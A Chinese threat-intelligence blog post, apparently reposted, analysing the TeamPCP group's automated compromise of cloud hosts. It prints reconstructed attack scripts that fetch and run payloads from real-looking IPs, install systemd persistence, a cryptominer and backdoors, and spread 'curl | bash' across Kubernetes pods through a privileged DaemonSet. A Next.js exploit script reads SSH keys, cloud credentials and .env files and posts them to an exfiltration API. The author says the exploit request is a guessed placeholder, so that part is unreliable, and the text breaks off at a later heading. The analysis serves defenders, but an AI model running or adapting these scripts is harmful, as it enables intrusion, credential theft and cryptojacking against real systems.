云主机自动沦陷成为黑产节点,黑客利用5个脚本全自动实现

admin 2026-03-03 07:43:05 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档分析了黑客团伙TeamPCP针对云主机的自动化攻击链,涵盖五个攻击阶段和五个关键脚本的功能解析。攻击者通过配置不当的Docker容器入侵,利用proxy.sh脚本实现持久化、部署挖矿程序和后门,通过kube.py在K8s集群横向移动,利用react.py结合CVE-2025-29927漏洞窃取凭据。文章提供了完整的脚本还原与行为分析,揭示了黑产自动化的技术路径。 综合评分: 83 文章分类: 恶意软件,云安全,威胁情报,漏洞分析,应急响应


cover_image

云主机自动沦陷成为黑产节点,黑客利用5个脚本全自动实现

原创

suntiger suntiger

二进制空间安全

2026年2月22日 11:45 北京

将二进制空间安全设为”星标⭐️”

第一时间收到文章更新

技术背景

#

黑客团伙(TeamPCP)的整个攻击过程分为五个阶段, 包括:攻击准备、入口突破、加载首个恶意脚本、黑产服务安装、自动扩散。黑客团伙为了行动隐蔽和防溯源, 主要利用Telegram群组频道进行动态发布、私聊指挥行动,买卖窃取的数据或访问权限。利用TOR(洋葱)网络隐藏真实服务器位置、托管C2面板、Sliver下载页,降低被溯源、封禁的风险。黑客维护了两台Sliver C2下载服务器,而攻击链从Docker切入,主要通过自动扫描配置不当的Alpine容器作为首次立足点,当入侵首个Alpine容器后,黑客会在目标中部署并执行脚本proxy.sh,该脚本会部署加密货币挖矿程序、安装系统服务、后门、并从下载服务器上拉取4个脚本进行数据窃取和自动扩散,整体架构图如下:

#

proxy.sh脚本功能

#

proxy.sh脚本被执行后会同时做多项工作,包括:在宿主机或容器内注册系统服务,实现持久化或更深层控制; 部署加密货币挖矿程序,利用被控环境算力进行挖矿; 部署后门,便于攻击者后续再次接入和控制; 从两台服务器(67.217.57.240、44.252.85.168)下载脚本并投放到当前环境,脚本文件包括: kube.sh或kube.py、react.py(React2Shell利用与数据窃取)、pcpcat.py或teampcp.py(扫描与部署)、redis-deploy.py(redis利用)、scanner.py(发现新目标)。其脚本内容归类总结如下:

#!/bin/sh# =============================================================================# proxy.sh - TeamPCP 攻击链主控脚本# 功能:① 安装系统服务 ② 部署加密货币挖矿程序 ③ 部署后门 ④ 从下载服务器拉取并投放脚本# =============================================================================
# 两台下载服务器(图中与报告一致)SRV1="http://67.217.57.240:666"SRV2="http://44.252.85.168:666"FILES="${SRV2}/files"# 工作目录:宿主机或容器内可写路径dir="${dir:-/tmp/teampcp}"mkdir -p "$dir" 2>/dev/null
# ---------- ④ 从下载服务器拉取并投放脚本(先拉取,后续会用到) ----------# 图中:从 67.217.57.240、44.252.85.168 下载并投放到当前环境fetchScript() {  _url="$1"  _name="$2"  curl -fsSL "$_url" -o "${dir}/${_name}" 2>/dev/null && chmod +x "${dir}/${_name}" 2>/dev/null}fetchScript "${FILES}/kube.py"       "kube.py"fetchScript "${FILES}/react.py"     "react.py"fetchScript "${FILES}/teampcp.py"    "teampcp.py"fetchScript "${FILES}/pcpcat.py"     "pcpcat.py"fetchScript "${FILES}/redis-deploy.py" "redis-deploy.py"fetchScript "${FILES}/scanner.py"    "scanner.py"
# ---------- ① 安装系统服务(宿主机或容器内注册,实现持久化或更深层控制) ----------installSystemServices() {&nbsp;&nbsp;if&nbsp;[ ! -d /etc/systemd/system ];&nbsp;then&nbsp; &nbsp;&nbsp;return&nbsp;&nbsp;fi&nbsp;&nbsp;# 1) PCPcat React 扫描器服务&nbsp;&nbsp;cat&nbsp;> /etc/systemd/system/teampcp-react.service <<&nbsp;SVCEOF[Unit]Description=PCPcat React ScannerAfter=network.target[Service]Type=simpleWorkingDirectory=${dir}ExecStart=/usr/bin/python3 ${dir}/react.pyRestart=alwaysRestartSec=60[Install]WantedBy=multi-user.targetSVCEOF&nbsp; systemctl daemon-reload 2>/dev/null&nbsp; systemctl&nbsp;enable&nbsp;teampcp-react.service 2>/dev/null&nbsp; systemctl start teampcp-react.service 2>/dev/null&nbsp;&nbsp;if&nbsp;[ -f&nbsp;"${dir}/scanner.py"&nbsp;];&nbsp;then&nbsp; &nbsp;&nbsp;cat&nbsp;> /etc/systemd/system/teampcp-scanner.service <<&nbsp;SVCEOF2[Unit]Description=PCPcat ScannerAfter=network.target[Service]Type=simpleWorkingDirectory=${dir}ExecStart=/usr/bin/python3 ${dir}/scanner.pyRestart=alwaysRestartSec=120[Install]WantedBy=multi-user.targetSVCEOF2&nbsp; &nbsp; systemctl daemon-reload 2>/dev/null&nbsp; &nbsp; systemctl&nbsp;enable&nbsp;teampcp-scanner.service 2>/dev/null&nbsp; &nbsp; systemctl start teampcp-scanner.service 2>/dev/null&nbsp;&nbsp;fi}installSystemServices
# ---------- ② 部署加密货币挖矿程序(利用被控环境算力进行挖矿) ----------deployCryptominer() {&nbsp; _url="${FILES}/BORING_SYSTEM"&nbsp; _out="${dir}/BORING_SYSTEM"&nbsp; curl -fsSL&nbsp;"$_url"&nbsp;-o&nbsp;"$_out"&nbsp;2>/dev/null ||&nbsp;true&nbsp;&nbsp;if&nbsp;[ -f&nbsp;"$_out"&nbsp;];&nbsp;then&nbsp; &nbsp;&nbsp;chmod&nbsp;+x&nbsp;"$_out"&nbsp;2>/dev/null&nbsp; &nbsp; (&nbsp;"$_out"&nbsp;& ) 2>/dev/null&nbsp;&nbsp;fi&nbsp; _miner_url="${FILES}/mine.sh"&nbsp; _miner_out="${dir}/mine.sh"&nbsp; curl -fsSL&nbsp;"$_miner_url"&nbsp;-o&nbsp;"$_miner_out"&nbsp;2>/dev/null ||&nbsp;true&nbsp;&nbsp;if&nbsp;[ -f&nbsp;"$_miner_out"&nbsp;];&nbsp;then&nbsp; &nbsp;&nbsp;chmod&nbsp;+x&nbsp;"$_miner_out"&nbsp;2>/dev/null&nbsp; &nbsp; ( sh&nbsp;"$_miner_out"&nbsp;& ) 2>/dev/null&nbsp;&nbsp;fi}deployCryptominer
# ---------- ③ 部署后门(便于攻击者后续再次接入与控制) ----------deployBackdoor() {&nbsp;&nbsp;for&nbsp;_base&nbsp;in&nbsp;"$SRV1"&nbsp;"$SRV2";&nbsp;do&nbsp; &nbsp; _frps="${_base}/files/frps"&nbsp; &nbsp; _gost="${_base}/files/gost"&nbsp; &nbsp; _sliver="${_base}/files/sliver"&nbsp; &nbsp;&nbsp;for&nbsp;_url&nbsp;in&nbsp;"$_frps"&nbsp;"$_gost"&nbsp;"$_sliver";&nbsp;do&nbsp; &nbsp; &nbsp; _name=$(basename&nbsp;"$_url")&nbsp; &nbsp; &nbsp; _path="${dir}/${_name}"&nbsp; &nbsp; &nbsp; curl -fsSL&nbsp;"$_url"&nbsp;-o&nbsp;"$_path"&nbsp;2>/dev/null &&&nbsp;chmod&nbsp;+x&nbsp;"$_path"&nbsp;2>/dev/null && (&nbsp;"$_path"&nbsp;& ) 2>/dev/null&nbsp; &nbsp;&nbsp;done&nbsp;&nbsp;done}deployBackdoor
# ---------- K8s 环境检测:若在集群内则拉取并执行 kube.py(横向移动) ----------if&nbsp;[ -f /var/run/secrets/kubernetes.io/serviceaccount/token ];&nbsp;then&nbsp; fetchScript&nbsp;"${FILES}/kube.py"&nbsp;"k8s.py"&nbsp; [ -f&nbsp;"${dir}/k8s.py"&nbsp;] && python3&nbsp;"${dir}/k8s.py"&nbsp;2>/dev/null &fi
# ---------- ④ 续:拉取脚本后,在后台启动扫描/发现类脚本(发现新目标) ----------[ -f&nbsp;"${dir}/teampcp.py"&nbsp;] && ( python3&nbsp;"${dir}/teampcp.py"&nbsp;& ) 2>/dev/null[ -f&nbsp;"${dir}/pcpcat.py"&nbsp;] &nbsp;&& ( python3&nbsp;"${dir}/pcpcat.py"&nbsp;& ) 2>/dev/null[ -f&nbsp;"${dir}/redis-deploy.py"&nbsp;] && ( python3&nbsp;"${dir}/redis-deploy.py"&nbsp;& ) 2>/dev/null

#

kube.py脚本功能

#

kube.py脚本作用是在检测到K8s环境时由proxy.sh拉取执行;做集群内横向移动并建立持久化。其行为包括:利用集群内serviceaccount等凭据,通过K8s API枚举 namespace、pod 等。对每个pod调用exec接口,在容器内执行:curl -fsSL <PROXY_URL> | bash(即再次拉取并执行 proxy.sh),把整个集群变成可自我扩散的“扫描/代理网”。在集群中部署DaemonSet(如名称 system-monitor,命名空间 kube-system),实现持久化与宿主机级控制,其核心内容如下:

# -*- coding: utf-8 -*-# =============================================================================# kube.py - TeamPCP K8s 集群内横向移动与持久化# =============================================================================
import&nbsp;urllib.requestimport&nbsp;ssl
PROXY_URL =&nbsp;"http://44.252.85.168:666/files/proxy.sh"

def&nbsp;spread_to_pods():&nbsp; &nbsp;&nbsp;"""对每个 pod 调用 exec,在容器内执行 curl proxy.sh | bash"""&nbsp; &nbsp;&nbsp;for&nbsp;pod&nbsp;in&nbsp;pods:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pod_name = pod['metadata']['name']&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; namespace = pod['metadata']['namespace']&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; exec_url =&nbsp;f"{api_url}/api/v1/namespaces/{namespace}/pods/{pod_name}/exec"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; exec_url +=&nbsp;f"?command=sh&command=-c&command=curl+-fsSL+{PROXY_URL}+|+bash"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; exec_url +=&nbsp;"&stdout=true&stderr=true"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(exec_url, method='POST')&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=30)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;continue&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;continue

# ---- &nbsp;DaemonSet:在每节点部署特权Pod,挂载宿主机并再次拉取proxy.sh ----daemonset = {&nbsp; &nbsp;&nbsp;"apiVersion":&nbsp;"apps/v1",&nbsp; &nbsp;&nbsp;"kind":&nbsp;"DaemonSet",&nbsp; &nbsp;&nbsp;"metadata": {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"name":&nbsp;"system-monitor",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"namespace":&nbsp;"kube-system"&nbsp; &nbsp; },&nbsp; &nbsp;&nbsp;"spec": {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"selector": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"matchLabels": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"app":&nbsp;"system-monitor"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; },&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"template": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"metadata": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"labels": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"app":&nbsp;"system-monitor"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; },&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"spec": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"hostNetwork":&nbsp;True,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"hostPID":&nbsp;True,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"containers": [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"name":&nbsp;"monitor",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"image":&nbsp;"alpine:latest",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"command": [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"sh",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"-c",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"apk add curl bash python3 >/dev/null 2>&1; "&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"curl -fsSL "&nbsp;+ PROXY_URL +&nbsp;" | bash; "&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"sleep infinity"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ],&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"securityContext": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"privileged":&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; },&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"volumeMounts": [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"name":&nbsp;"host",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"mountPath":&nbsp;"/host"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ]&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ],&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"volumes": [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"name":&nbsp;"host",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"hostPath": {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"path":&nbsp;"/"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ]&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }}

#

react.py脚本功能

#

react.py脚本针对存在 CVE-2025-29927(React2Shell)的 React/Next.js 应用,实现远程命令执行、窃取敏感数据并投递下一阶段。具体行为包括:(1).从攻击者控制的 API 拉取目标域名列表。(2).构造特制 Next.js 请求(如 multipart 表单 + 框架相关头),触发服务端执行并通过重定向元数据取回命令输出。(3).执行成功后,在目标上跑一系列命令收集:环境变量、.env 类文件、Git 凭据、多用户 SSH 密钥、云厂商凭据、基础主机信息等,并回传到同一控制 API。(4).窃取完成后,尝试投递二级载荷:通过 apk/apt/yum/curl/wget/python 等下载并执行远程脚本,用于持久化或代理。其脚本还原内容如下:

# -*- coding: utf-8 -*-# 功能摘要:# - 从中心 API 拉取目标域名,利用 CVE-2025-29927 实现远程命令执行# - 通过特制 Next.js 请求(multipart + 框架头)触发服务端执行,经重定向元数据取回输出# - 窃取 .env、环境变量、Git 凭据、SSH 密钥、云凭据、主机信息并回传至同一控制 API# - 成功后按目标 OS(apk/apt/yum)下载并执行远程脚本,建立持久化或代理# =============================================================================
import&nbsp;urllib.requestimport&nbsp;urllib.errorimport&nbsp;sslimport&nbsp;jsonimport&nbsp;re
# control_host 可能同时提供:目标列表、回传接收、二级载荷CONTROL_BASE =&nbsp;"http://44.252.85.168:666"TARGETS_API =&nbsp;f"{CONTROL_BASE}/api/targets"&nbsp; &nbsp;# 拉取目标域名列表EXFIL_API =&nbsp;f"{CONTROL_BASE}/api/exfil"&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 回传窃取数据PAYLOAD_URL =&nbsp;f"{CONTROL_BASE}/files/proxy.sh"&nbsp;# 二级载荷,用于持久化或代理
# 忽略 SSL 校验证书ctx = ssl.create_default_context()ctx.check_hostname =&nbsp;Falsectx.verify_mode = ssl.CERT_NONE

def&nbsp;getTargets():&nbsp; &nbsp;&nbsp;# getTargets - 从中心 API 拉取待攻击域名列表&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(TARGETS_API)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=30)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data = resp.read().decode("utf-8", errors="ignore")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 假定返回 JSON 数组或每行一域名的文本&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;json.loads(data)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;json.JSONDecodeError:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[line.strip()&nbsp;for&nbsp;line&nbsp;in&nbsp;data.splitlines()&nbsp;if&nbsp;line.strip()]&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[]

def&nbsp;runRemoteCmd(domain, cmd, baseUrl=None):&nbsp; &nbsp;&nbsp;# runRemoteCmd - 在目标域名上通过 React2Shell 执行命令并取回输出&nbsp; &nbsp;&nbsp;# 参数: domain 目标域名, cmd 要执行的 shell 命令, baseUrl 可选(如 https://domain.com)&nbsp; &nbsp;&nbsp;# 返回: 命令输出文本,失败返回 None&nbsp; &nbsp; baseUrl = baseUrl&nbsp;or&nbsp;("https://"&nbsp;+ domain&nbsp;if&nbsp;not&nbsp;domain.startswith("http")&nbsp;else&nbsp;domain)&nbsp; &nbsp;&nbsp;# CVE-2025-29927(React2Shell):构造特制 Next.js 请求&nbsp; &nbsp;&nbsp;# 报告中:multipart form data + framework-specific headers,触发服务端执行,经 redirect 元数据取回输出&nbsp; &nbsp;&nbsp;# 真实漏洞端点、表单字段名及输出回传方式未公开,以下为依描述还原的合理结构&nbsp; &nbsp; url = baseUrl.rstrip("/") +&nbsp;"/api/route"&nbsp;&nbsp;# 占位;实际路径依 Next.js 与漏洞端点而定&nbsp; &nbsp; payload = (&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b'------WebKitFormBoundary\r\n'&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b'Content-Disposition: form-data; name="field"; filename="x"\r\n\r\n'&nbsp; &nbsp; &nbsp; &nbsp; + cmd.encode("utf-8") +&nbsp;b'\r\n------WebKitFormBoundary--'&nbsp; &nbsp; )&nbsp; &nbsp; req = urllib.request.Request(&nbsp; &nbsp; &nbsp; &nbsp; url,&nbsp; &nbsp; &nbsp; &nbsp; data=payload,&nbsp; &nbsp; &nbsp; &nbsp; method="POST",&nbsp; &nbsp; &nbsp; &nbsp; headers={&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"Content-Type":&nbsp;"multipart/form-data; boundary=----WebKitFormBoundary",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"User-Agent":&nbsp;"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",&nbsp; &nbsp; &nbsp; &nbsp; },&nbsp; &nbsp; )&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;urllib.request.urlopen(req, context=ctx, timeout=15)&nbsp;as&nbsp;resp:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 若输出在响应体则直接读;若在 Location 或自定义头则需解析&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; body = resp.read().decode("utf-8", errors="ignore")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 尝试从重定向或响应中提取输出(示例:可能编码在 Location 或 JSON 中)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;match&nbsp;= re.search(r"output=([^&\s]+)", body)&nbsp;or&nbsp;re.search(r'"output"\s*:\s*"([^"]*)"', body)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;match:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;urllib.request.unquote(match.group(1))&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;body[:8192]&nbsp;if&nbsp;body&nbsp;else&nbsp;None&nbsp; &nbsp;&nbsp;except&nbsp;urllib.error.HTTPError&nbsp;as&nbsp;e:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 部分利用链可能通过错误页或 302 携带输出&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;e.code ==&nbsp;302&nbsp;and&nbsp;e.headers.get("Location"):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;e.headers.get("Location",&nbsp;"")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;e.read().decode("utf-8", errors="ignore")[:8192]&nbsp;if&nbsp;e.fp&nbsp;else&nbsp;None&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;None

def&nbsp;getHarvestCommands():&nbsp; &nbsp;&nbsp;# getHarvestCommands - 返回用于窃取敏感数据的命令列表(每条在目标上执行后取回输出)&nbsp; &nbsp;&nbsp;return&nbsp;[&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"cat .env .env.local .env.* 2>/dev/null",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"printenv",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"git config --list 2>/dev/null",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"cat /root/.ssh/id_rsa /root/.ssh/id_ed25519 /home/*/.ssh/id_rsa /home/*/.ssh/id_ed25519 2>/dev/null",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"cat /root/.aws/credentials /home/*/.aws/credentials 2>/dev/null",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"cat /root/.config/gcloud/credentials.json /home/*/.config/gcloud/*.json 2>/dev/null",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"hostname; uname -a; id; whoami",&nbsp; &nbsp; ]

def&nbsp;harvestAndExfil(domain, runCmd):&nbsp; &nbsp;&nbsp;# harvestAndExfil - 在已取得 RCE 的目标上执行窃取命令,并将结果回传至控制 API&nbsp; &nbsp;&nbsp;# 参数: domain 当前目标域名, runCmd 可调用 runRemoteCmd(domain, cmd) 的函数&nbsp; &nbsp; results = {"domain": domain,&nbsp;"harvest": {}}&nbsp; &nbsp;&nbsp;for&nbsp;i, cmd&nbsp;in&nbsp;enumerate(getHarvestCommands()):&nbsp; &nbsp; &nbsp; &nbsp; out = runCmd(cmd)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;out:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; results["harvest"]["cmd_%d"&nbsp;% i] = out[:65535]&nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;results["harvest"]:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; data = json.dumps(results).encode("utf-8")&nbsp; &nbsp; &nbsp; &nbsp; req = urllib.request.Request(&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EXFIL_API,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data=data,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; method="POST",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; headers={"Content-Type":&nbsp;"application/json"},&nbsp; &nbsp; &nbsp; &nbsp; )&nbsp; &nbsp; &nbsp; &nbsp; urllib.request.urlopen(req, context=ctx, timeout=30)&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass

def&nbsp;deploySecondary(domain, runCmd):&nbsp; &nbsp;&nbsp;# deploySecondary - 在目标上下载并执行远程脚本,建立持久化或访问代理&nbsp; &nbsp;&nbsp;# 报告中:通过 apk/apt/yum/curl/wget/python 等按 OS 选择方式下载执行&nbsp; &nbsp; bootstrap = (&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"apk add --no-cache curl 2>/dev/null || apt-get install -y curl 2>/dev/null || yum install -y curl 2>/dev/null; "&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"curl -fsSL '%s' | sh 2>/dev/null || wget -qO- '%s' | sh 2>/dev/null || python3 -c \"import urllib.request; exec(urllib.request.urlopen('%s').read().decode())\" 2>/dev/null"&nbsp; &nbsp; ) % (PAYLOAD_URL, PAYLOAD_URL, PAYLOAD_URL)&nbsp; &nbsp; runCmd(bootstrap)

def&nbsp;main():&nbsp; &nbsp;&nbsp;# main - 主流程:拉取目标 → 利用 React2Shell 执行命令 → 窃取并回传 → 投递二级载荷&nbsp; &nbsp; targets = getTargets()&nbsp; &nbsp;&nbsp;for&nbsp;domain&nbsp;in&nbsp;targets:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;domain:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;continue&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 探测是否可利用:执行 id 或 echo&nbsp; &nbsp; &nbsp; &nbsp; out = runRemoteCmd(domain,&nbsp;"id")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;out:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; out = runRemoteCmd(domain,&nbsp;"echo 1")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;out:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; harvestAndExfil(domain,&nbsp;lambda&nbsp;cmd: runRemoteCmd(domain, cmd))&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; deploySecondary(domain,&nbsp;lambda&nbsp;cmd: runRemoteCmd(domain, cmd))

if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp; main()

以下是TeamPCP窃取到的数据:

#

#

pcpcat.py脚本功能

#

